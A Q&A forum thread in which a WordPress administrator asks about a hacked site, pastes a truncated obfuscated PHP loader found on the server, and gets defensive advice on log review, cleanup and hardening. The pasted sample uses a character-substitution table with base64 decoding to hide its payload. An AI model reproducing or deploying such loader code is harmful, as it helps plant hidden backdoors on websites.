Corrupted file on my ftp server in my wordpress site

Question

I'm in charge of Wordpress website. 1 year ago, the site had has been hacked. When someone connected on the site by typing the url, he was redirected to another "fake" site. I discovered that a line was simply in the index.php to redirect to another site. I removed the line and made a restoration of my ftp server. Before that i noticed some susicious files on the ftp server, i did not created these file, and there was some obscure php and js code, with some random char.

Recently the site had the same problem unless there was only a blank page when we connect on the site. I restored again the site. Before that i noticed some suspicious files on the ftp server, i did not created these file, and there was some obscure php and js code in it, with some random char.

All the files had almost the same date of vreation and i had no right to delete them from the server. I think that the vulnerabilities come from here but i can't find any similar case on the internet. Do someone have information about it ? I'm just looking for some information know and i don't have access to the site at the moment.

EDIT:

I have this kind of file :

    <?php
$vHMX55W = Array('1'=>'C', '0'=>'j', '3'=>'U', '2'=>'x', '5'=>'F', '4'=>'s', '7'=>'q', '6'=>'P', '9'=>'T', '8'=>'y', 'A'=>'5', 'C'=>'e', 'B'=>'G', 'E'=>'f', 'D'=>'a', 'G'=>'1', 'F'=>'2', 'I'=>'7', 'H'=>'m', 'K'=>'X', 'J'=>'n', 'M'=>'c', 'L'=>'E', 'O'=>'v', 'N'=>'M', 'Q'=>'i', 'P'=>'Q', 'S'=>'g', 'R'=>'O', 'U'=>'A', 'T'=>'I', 'W'=>'h', 'V'=>'N', 'Y'=>'S', 'X'=>'t', 'Z'=>'6', 'a'=>'3', 'c'=>'Z', 'b'=>'w', 'e'=>'R', 'd'=>'k', 'g'=>'9', 'f'=>'z', 'i'=>'J', 'h'=>'4', 'k'=>'V', 'j'=>'D', 'm'=>'0', 'l'=>'d', 'o'=>'u', 'n'=>'W', 'q'=>'8', 'p'=>'b', 's'=>'l', 'r'=>'Y', 'u'=>'K', 't'=>'H', 'w'=>'r', 'v'=>'L', 'y'=>'p', 'x'=>'o', 'z'=>'B');
function v9PSABL($vMCS1QU, $vDG7FSU){$v4ZU9QC = ''; for($i=0; $i < strlen($vMCS1QU); $i++){$v4ZU9QC .= isset($vDG7FSU[$vMCS1QU[$i]]) ? $vDG7FSU[$vMCS1QU[$i]] : $vMCS1QU[$i];}
return base64_decode($v4ZU9QC);}
$vW073GA = 'DnrxDKVfcKPxi5g9ekinekTyuPyI1SddKGV53sc53s4J3LWPKGV59Lr'.
'JKYUgT1TOT04S1SddKGV53sc53s4J3dkV9Ge5Km5Le5TJKYUgT1T2N0MoN1hbv0LQRbxiDn'.
'rxTnkXMteAu1eE3mkYkdkYn8lTk5ePKGWEedgYkm5YeLkLKmc63QlluYdu1K4u1PddKGV53sc53s4JY5'.
'e335grKmc63slz3de5e5gB9GTJKYUgT1T2N0MoN1hbv0LQRbxiEPyg1SyycQWyMaVsl1SdKmci9Lk9uYduCbxicHg8cn50D1S'.
'dKmci9Lk9TB5fT1ewcKdS69hSiBcypB3y1SsI1SdiDnrxTKVmMJzOM8SdcHs4ck4JpH5XcYllv1UQvHybc8TyuPxi1K4u1PdiiBc'.
'ypBkornGsTjmSrn2mcKiEpn50MHgfu1eHDn2sn8lornGsiGmyRbxi1PddcHs4cnAWpn3S6YzolnGEpn50MHgfu1eHDn2spH5XcYd'.
'I1Sdi1YeHDn2spH5XcYUgTtWolnGEpn50MHgfu1eHDn2spH5XcYdI1Sdi1YeEedsNekVp'.
'iBXsCkGpTHAWpn3QKYUgT1eHDn2spH5Xc94u1Psg1Ssg1Jmu1PyHlnA0lBsOpQz0lKVmp'.
'FGEMae8DKzElB5JM8SdlBkhl1duCbxST1USitesCtPS6YzfltiyM5gmrnlfu1'.
'emcKWmv1UJ6BL+i8dI1SxST1USitesCtPS6YzfltiEMHkbpB50cYSQ6BLSDtisc0GMTQT4T1ipT1T4T1emcKWmu94uT1UST1e'.
'mcKWmTjmSMae8KaisMB2WrF3xT0bOr9hQv1UQTQbSitesCtPyRbxST1USitesCtPS6Yzflti'.
'EMHkbpB50cYSQK1T+TQbSTQzlT1T4T1emcKWmu94u1QUST1z8cKeGMHhSi'.
'tesCtPI1Jmu1HcGpHVmDngoTBsfKFsbu1efltTyTt4uT1z8cKeGMHhSMtiscGgXrKe0D1S'.
'QvGhxnfLXRkGqnfLXRkGpN1mAKKb2nfUXRkGpN1mAKKb8nfUXV5GpN1'.
'mAKKb8Vk4bv9kluYWMvQWpN1mAKK2pNYmAKk4bv9slEj5pN1mAKk4bv9slEjipN1mmKk4bv9slEjTGnf'.
'UXVkmyuK4fEYPOTQbdMae8u94uEPxucJkoraeypFhScJiOpkgxpaVmu1e0pFAmcnAmuPyI1SxST1USi'.
'BWOMaPS6YzbMHkJKaisMB2WrF3xi8gCutlala2HltUyK1hODYM4i8'.
'M4P1eE3mkYkdkYn8lTk5ePKmW63GPJKYdI1SxST1USDnrSuBsfKFsbu1expaVmuYduT1UST'.
't4uT1UST1UST1z8cKeGMHhSiBVOpJespJPI1QUST1zg1QUST1UuT1UST1empFXspJNS6YzsCtz4pFesu1iUTQbSiBVOpJespJPy'.
'RbxuT1UST1e0pFAmcnAmTjmSiteODFkoMG4bKYUoT1iUTQUoT1exp'.
'aVmT1hST0hQRbxuT1USTtisltk8pQUdrFgolBkolj4uEPxucJkoraeypFhSrn2mcKiEpn50MHgfu1e0pFAmcn'.
'AmuPyI1QUST1zbMHkJKFGWlBVxKF54p1SJTa4xvQxyEYVkDYM4T1e0pFAmcnAmv1Udpn5mr'.
'FWsM8dI1SxST1UScHg8u1eyTjmSNj4SiBdS61z0pakol1Sdpn5mrFWsMG'.
'42KYdIT1eyu84y1QUST1zI1SxST1UST1UST1eoM8UgTBkhMB2OcB3xTJbQv1Udpn5mrF'.
'WsMG42Kk4dDkmyRbxST1UST1UST1e0NQUgTBVOlnAmu1eoM8dI'.
'1QUST1UST1USitiWpHPS6Yz8rnAdujU4T1SdrfTSvYU2uYdI1QUST1UST1USiBVOpJespJPS6Yz'.
'fltiEMHkbpB50cYSQC8ToiBGWlBVxcKVpNkGpiBslvQigTQbSiBAfn8'.

someone know what it is ?

Answer 1

This is incredibly broad. There are literally millions of possible vectors for attack on a website. The fact that you were attacked does not in itself suggest any one of those possibilities over any other.

Since you have a timestamp when the attack occurred, check server logs at that time for clues about the vector. Was there SFTP access at that time? Perhaps a legitimate user's password is compromised. Was there HTTP access at that time? Perhaps a plugin has a vulnerability and needs to be disabled or upgraded.

An attacker only needs one vulnerability to gain access to the site. It may be obvious which it was (eg, if you see SFTP activity from a known user account), or it may take extensive research to figure out what happened and how.

Answer 2

It's very simple: you got hacked.

Forget trying to deobfuscate the php files; they may tell you what the files do, but they won't tell you how the files got there. Delete them all.

And you won't find the exploit vector unless you carefully parse server logs and check all your plugins and theme for vulnerabilities. And the vector could have been malware on your own PC/mac that stole credentials.

The fix is simple: carefully clean the site and the hosting account by following FAQ My site was hacked - WordPress Codex. Scan your own PC/Mac and any machine that was used to access WordPress admin and the hosting account.

If this is you own server, you need to harden it, too. Try searching https://serverfault.com/ for information on your OS and how to secure and harden it.

And take a look at the recommended security measures for WordPress itself in Hardening WordPress - WordPress Codex and Brute Force Attacks - WordPress Codex

Answer 3

When you say you have no right to delete them, aren't you managing the site? If you do not have full administrative rights, you should contact whoever does and explain the situation so that they may handle it immediately, or at least enable you to do so.

Do you know how the site was hacked the first and second time? Obviously there is a vulnerability that needs to be addressed.

What kind of files were left behind? Can you examine/explain the contents any further than finding 'obscure' code?